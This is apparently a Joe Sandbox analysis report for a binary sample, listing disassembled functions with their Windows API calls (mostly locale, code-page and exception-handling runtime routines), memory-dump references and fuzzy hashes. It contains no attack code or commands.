                            control_flow_graph 355 1327341-132735a call 132704c call 132798f 359 132735f-1327366 355->359 360 1327378-132737c 359->360 361 1327368-1327373 call 13220c0 359->361 363 1327385-1327387 360->363 364 132737e-1327384 call 13295f5 360->364 361->360 364->363
                            APIs
                            • std::ios_base::_Init.LIBCPMT ref: 01327347
                              • Part of subcall function 0132704C: __EH_prolog3.LIBCMT ref: 01327053
                              • Part of subcall function 0132704C: std::locale::_Init.LIBCPMT ref: 0132709C
                              • Part of subcall function 0132798F: __EH_prolog3.LIBCMT ref: 01327996
                              • Part of subcall function 013220C0: ___std_exception_copy.LIBVCRUNTIME ref: 0132215D
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3Init$___std_exception_copystd::ios_base::_std::locale::_
                            • String ID:
                            • API String ID: 2400365081-0
                            • Opcode ID: 8df86ab7bb4ff7505743d2294992b24d1b3464ed4371a3d718b46fd2e1d3f304
                            • Instruction ID: 9eaa00627ddc38ffeb5404b421886489710f1866611f58070711b3cb3a70ed03
                            • Opcode Fuzzy Hash: 8df86ab7bb4ff7505743d2294992b24d1b3464ed4371a3d718b46fd2e1d3f304
                            • Instruction Fuzzy Hash: 56F09B316007709BE730B67D9449B9BBBD5BF21738F10941EE58657681CAB9F444CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 01327996
                              • Part of subcall function 01326967: __EH_prolog3.LIBCMT ref: 0132696E
                              • Part of subcall function 01326967: std::_Lockit::_Lockit.LIBCPMT ref: 01326978
                              • Part of subcall function 01326967: std::_Lockit::~_Lockit.LIBCPMT ref: 013269E9
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                            • String ID:
                            • API String ID: 1538362411-0
                            • Opcode ID: ce20f36feb37c3c22ee9841a2d79d0a18428c8952e728e9381706c5aa28bbaca
                            • Instruction ID: da8f8754eb7a30ac74fe8b4f363baf7f43712ec9782b66e4b7eee90cf8155257
                            • Opcode Fuzzy Hash: ce20f36feb37c3c22ee9841a2d79d0a18428c8952e728e9381706c5aa28bbaca
                            • Instruction Fuzzy Hash: 40E06DB9A0012AAFDF04FBA4C515AED77B5FF64359F200049D8026B381DF35AA1ACB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog3
                            • String ID:
                            • API String ID: 431132790-0
                            • Opcode ID: 250c83494176d582f7690dcc2e38a0717d9b86e687a6a14e9efd21e8e5535945
                            • Instruction ID: 0b8bd1dda22d23760cc2b2d5327b8bded9ecef4fe533cfe4f9181b3608d4666d
                            • Opcode Fuzzy Hash: 250c83494176d582f7690dcc2e38a0717d9b86e687a6a14e9efd21e8e5535945
                            • Instruction Fuzzy Hash: 7BE09AB6D0021EAADF40EFE8C452FEFB7BCAF14319F604056D205E6140EB7497488BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: e3c846ea6d471794664f1a41c6ffae87e7a1f69aa0769c7f5fc4d6a8daa6eaa7
                            • Instruction ID: 462c7142734b32fac956b9cde13bc3e2159a438644bb6816312d75d2dd57684e
                            • Opcode Fuzzy Hash: e3c846ea6d471794664f1a41c6ffae87e7a1f69aa0769c7f5fc4d6a8daa6eaa7
                            • Instruction Fuzzy Hash: 56D21671E082298BDB65CE28DD407EAB7F9FB44309F1445EAD44DE7240EB78AE858F41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLocaleInfoW.KERNEL32(?,2000000B,0134299B,00000002,00000000,?,?,?,0134299B,?,00000000), ref: 01342716
                            • GetLocaleInfoW.KERNEL32(?,20001004,0134299B,00000002,00000000,?,?,?,0134299B,?,00000000), ref: 0134273F
                            • GetACP.KERNEL32(?,?,0134299B,?,00000000), ref: 01342754
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: edfcde6bfd9f7abdde6fc517716a4b461d712c52d415041e70f3faf41a64a795
                            • Instruction ID: cf0028150c47c3587ff3950a6e9ed49c14bc7f0f96d8ecdeb50a978cf63f5c63
                            • Opcode Fuzzy Hash: edfcde6bfd9f7abdde6fc517716a4b461d712c52d415041e70f3faf41a64a795
                            • Instruction Fuzzy Hash: DF21D875600104ABEB35CF69E900B977BE6EF44B6CB568464F90AF7116E732F941C360
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0134295E
                            • IsValidCodePage.KERNEL32(00000000), ref: 013429A7
                            • IsValidLocale.KERNEL32(?,00000001), ref: 013429B6
                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 013429FE
                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 01342A1D
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                            • String ID:
                            • API String ID: 415426439-0
                            • Opcode ID: 470b7b6a3d622279b9ddcd2a7bee3af0a1ebd9711b42f6cfc2de64fab91c063b
                            • Instruction ID: b249371deacb30157b45133e248d508c61e94e36dbeac6f9582d7e1100b3c27c
                            • Opcode Fuzzy Hash: 470b7b6a3d622279b9ddcd2a7bee3af0a1ebd9711b42f6cfc2de64fab91c063b
                            • Instruction Fuzzy Hash: 97517175910206ABEF10DFA9EC40ABF7BF8BF54748F054469FA11F7150DB70AA548B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • GetACP.KERNEL32(?,?,?,?,?,?,01335707,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 01341FAF
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,01335707,?,?,?,00000055,?,-00000050,?,?), ref: 01341FDA
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0134213D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CodeInfoLocalePageValid
                            • String ID: utf8
                            • API String ID: 607553120-905460609
                            • Opcode ID: cf58e7f6d597109d63380bffeb5f4a2154a4a4997c77bfa9ef8066e552ef918c
                            • Instruction ID: 03e0f1021a6422ee36c14be485df32e5fb570f0c8df258480f8d491deea28e8b
                            • Opcode Fuzzy Hash: cf58e7f6d597109d63380bffeb5f4a2154a4a4997c77bfa9ef8066e552ef918c
                            • Instruction Fuzzy Hash: C5711871A00606ABEB25AB7DDC41BAB77ECEF58318F004129FA05E7180EB70F581C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strrchr
                            • String ID:
                            • API String ID: 3213747228-0
                            • Opcode ID: f779180b85af581e06eedbf0b313eb824dd96dc620a2ee1e28a0d5b6ab5efbde
                            • Instruction ID: 095f123047bdd8723bbfd93ff0e74719528640517817a9941d641e307163d333
                            • Opcode Fuzzy Hash: f779180b85af581e06eedbf0b313eb824dd96dc620a2ee1e28a0d5b6ab5efbde
                            • Instruction Fuzzy Hash: D0B15A32D056469FDB168F6CC8807FEBBA5EF95358F1483A6F904EB341D2349901C7A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0132A561
                            • IsDebuggerPresent.KERNEL32 ref: 0132A62D
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0132A64D
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0132A657
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                            • String ID:
                            • API String ID: 254469556-0
                            • Opcode ID: 3c08aca239615e8d20fad08887bf28c65d34c1a820cda17c9237a17818767bcf
                            • Instruction ID: f392f71357a7552a6f3a6e68dbef2396c7ed860cf0d5142cc87669f38ba24ff5
                            • Opcode Fuzzy Hash: 3c08aca239615e8d20fad08887bf28c65d34c1a820cda17c9237a17818767bcf
                            • Instruction Fuzzy Hash: 01313A75D1132CDBDB20EFA5D989BCDBBB8AF08704F1040EAE409A7250EB745A848F04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 01342355
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0134239F
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 01342465
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale$ErrorLast
                            • String ID:
                            • API String ID: 661929714-0
                            • Opcode ID: fcfba62ae5d255f11d146fec56813c6eaf06068978fac726107c72e590af9945
                            • Instruction ID: 1c7d9461584815788bfb8e5aeadfa9931cca6664765c00bf16162d8ef8f2542f
                            • Opcode Fuzzy Hash: fcfba62ae5d255f11d146fec56813c6eaf06068978fac726107c72e590af9945
                            • Instruction Fuzzy Hash: 736181715502079FEB299F2CEC81BABB7F8EF14318F5040B9E906E6685EB74E941CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01330E69
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01330E73
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 01330E80
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: b3ff11c9d5beffe94aa347d69717e30f1813df4fdc294b4f893dded002ec5a4b
                            • Instruction ID: 6c92e84413184f034c8de8c0b8a958ba846d9d82716b00dd9e23fdf7f58525f8
                            • Opcode Fuzzy Hash: b3ff11c9d5beffe94aa347d69717e30f1813df4fdc294b4f893dded002ec5a4b
                            • Instruction Fuzzy Hash: E131E47491132DABCB21EF68D88878DBBB8BF08714F5045EAE41CA7250EB749B858F44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64d7b49ac23c98b739a5c6f396f25498a1f170e13fbd3058c3bc2d87a3afe990
                            • Instruction ID: 759dc60bcef9bc09ba79c9a6f0107d87ac7e030fc8e9c5490575b1b37744ca1b
                            • Opcode Fuzzy Hash: 64d7b49ac23c98b739a5c6f396f25498a1f170e13fbd3058c3bc2d87a3afe990
                            • Instruction Fuzzy Hash: F6F13E71E012199FDF14CFADC880AADBBB1FF88328F158269D915AB391D730A945CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %$+
                            • API String ID: 0-2626897407
                            • Opcode ID: 54640d564ded82dae49909599459addea3c52a7fd5c142ca78666a4561fb0af4
                            • Instruction ID: 629ee21fcf8d04ad75479a555b9c6ab7ff0d6d69bfca577f905212b553789db6
                            • Opcode Fuzzy Hash: 54640d564ded82dae49909599459addea3c52a7fd5c142ca78666a4561fb0af4
                            • Instruction Fuzzy Hash: CAF1C0325083659FD715EF28C840A6FBBF9FF99708F044A1DF985A7241D738E9448B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,013398B5,00000000,?,00000008,?,?,01345531,00000000), ref: 01339AE7
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionRaise
                            • String ID:
                            • API String ID: 3997070919-0
                            • Opcode ID: 606a02059d81d1011aecb0f1ff815e065ed748cba8440195f50e7f339501f2df
                            • Instruction ID: e4171cb4e87b2f31dfbbf13819c7e2b187c133f115cf0a1e1140661150cbbb51
                            • Opcode Fuzzy Hash: 606a02059d81d1011aecb0f1ff815e065ed748cba8440195f50e7f339501f2df
                            • Instruction Fuzzy Hash: 08B13931610609CFEB19CF2CC486B657BA0FF8536DF158658E99ACF2A1C375E982CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0132A032
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: FeaturePresentProcessor
                            • String ID:
                            • API String ID: 2325560087-0
                            • Opcode ID: 013b30ed2d457024dac71637e566e125699d4aec2576e60c56589f9951aec35e
                            • Instruction ID: 54864430b0613a33cb3dba4ac1b5303b5d0fa74e26e757851a6f772a4af5cc77
                            • Opcode Fuzzy Hash: 013b30ed2d457024dac71637e566e125699d4aec2576e60c56589f9951aec35e
                            • Instruction Fuzzy Hash: 9B51A2B1D00319CFEB25CF58D981BAABBF4FB48358F24816AC502EB655E374E940CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c931ecf88d3e1b206b4a5613eb5c1ed9a1588834fb345db6877a4805a8a6c26
                            • Instruction ID: 9f278c94e1cebd1f4e1d8850e5827a99b819ca067027f54c068aa17e19450513
                            • Opcode Fuzzy Hash: 9c931ecf88d3e1b206b4a5613eb5c1ed9a1588834fb345db6877a4805a8a6c26
                            • Instruction Fuzzy Hash: F741B5B5C0521DAFDF20DF6DCC88AAABBBCAF85204F5442D9E448E3200D6359E858F14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 013425A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale
                            • String ID:
                            • API String ID: 3736152602-0
                            • Opcode ID: 390b0e27d091955197540df65942d0c836bb42cc9d9bb7e663d19086c06b4759
                            • Instruction ID: 0b166c1c39726ca47b2d145f3de680abf32ee866304675609b71bbf978e6df51
                            • Opcode Fuzzy Hash: 390b0e27d091955197540df65942d0c836bb42cc9d9bb7e663d19086c06b4759
                            • Instruction Fuzzy Hash: B9217471515216ABEF289A19EC45A7B77E8EF44318F10007AF905E6141EB78E940D794
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 8dd7dfb75d7d52c0750a5127d57d696a5d27f07798467dd46a5266a64faa7a75
                            • Instruction ID: 99844ba1ebd3037cac28b108248fb40d43ba766022fa74ef32a3f672e5e9ae82
                            • Opcode Fuzzy Hash: 8dd7dfb75d7d52c0750a5127d57d696a5d27f07798467dd46a5266a64faa7a75
                            • Instruction Fuzzy Hash: 23B1447090062A8BDB39FF6CC550ABFBBB8AF4570CF10061EE566D7291C730A645CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • EnumSystemLocalesW.KERNEL32(01342301,00000001,00000000,?,-00000050,?,01342932,00000000,?,?,?,00000055,?), ref: 0134224D
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            • Opcode ID: 21a41faa657c65ac93ba75a52e9452e2029987aa5e6fd2a58fa264d5f4c40d24
